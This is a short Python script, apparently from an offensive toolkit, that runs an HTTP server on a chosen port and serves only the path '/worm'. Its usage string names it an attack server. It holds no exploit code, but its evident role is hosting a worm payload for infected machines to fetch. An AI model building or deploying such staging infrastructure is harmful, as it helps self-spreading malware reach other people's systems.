#!/usr/bin/env python3

import sys 
import subprocess
import http.server
import socketserver
import os

class SimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/worm":
            super().do_GET()
        else:
            self.send_error(404, "File not found")

def start_server(port):
    with socketserver.TCPServer(('0.0.0.0', port), SimpleHTTPRequestHandler) as httpd:
        print(f"Serving HTTP on 0.0.0.0 port {port}...")
        httpd.serve_forever()

def main():
    if len(sys.argv) != 2:
        print("./attack_server <Port>")
        sys.exit(1)
    
    port = int(sys.argv[1])
    start_server(port)

if __name__ == "__main__":
    main()